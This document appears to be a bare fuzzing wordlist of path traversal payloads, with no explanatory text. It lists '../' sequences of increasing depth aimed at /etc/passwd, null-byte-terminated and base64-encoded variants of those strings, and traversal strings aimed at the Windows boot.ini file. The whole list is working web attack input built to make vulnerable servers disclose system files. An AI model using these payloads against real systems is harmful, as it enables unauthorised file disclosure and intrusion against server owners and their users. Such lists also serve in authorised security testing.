/etc/passwd
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd
/etc/passwd%00
../etc/passwd%00
../../etc/passwd%00
../../../etc/passwd%00
../../../../etc/passwd%00
../../../../../etc/passwd%00
../../../../../../etc/passwd%00
../../../../../../../../etc/passwd%00
../../../../../../../../../etc/passwd%00
../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../etc/passwd%00
L2V0Yy9wYXNzd2Q=
Li4vZXRjL3Bhc3N3ZA0K
Li4vLi4vZXRjL3Bhc3N3ZA0K
Li4vLi4vLi4vZXRjL3Bhc3N3ZA0K
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA0KDQoNCg==
Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA0KDQo=
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA0KDQo=
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA0K
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA0KDQo=
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA0KDQoNCg==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA0KDQoNCg==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA0KDQoNCg0K
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA0KDQoNCg0K
../../boot.ini
../../../boot.ini
../../../../boot.ini
../../../../../boot.ini
../../../../../../boot.ini
../../../../../../../boot.ini
../../../../../../../../boot.ini
../../../../../../../../../boot.ini
../../../../../../../../../../boot.ini
../../../../../../../../../../../boot.ini
../../../../../../../../../../../../boot.ini
../../../../../../../../../../../../../boot.ini
../../../../../../../../../../../../../../boot.ini
../../../../../../../../../../../../../../../boot.ini
../../../../../../../../../../../../../../../../boot.ini
../../../../../../../../../../../../../../../../../boot.ini
../../../../../../../../../../../../../../../../../../boot.ini
../../../../../../../../../../../../../../../../../../../boot.ini
../../../../../../../../../../../../../../../../../../../../boot.ini
../../../../../../../../../../../../../../../../../../../../../boot.ini
../../../../../../../../../../../../../../../../../../../../../../boot.ini
../../../../../../../../../../../../../../../../../../../../../../../boot.ini
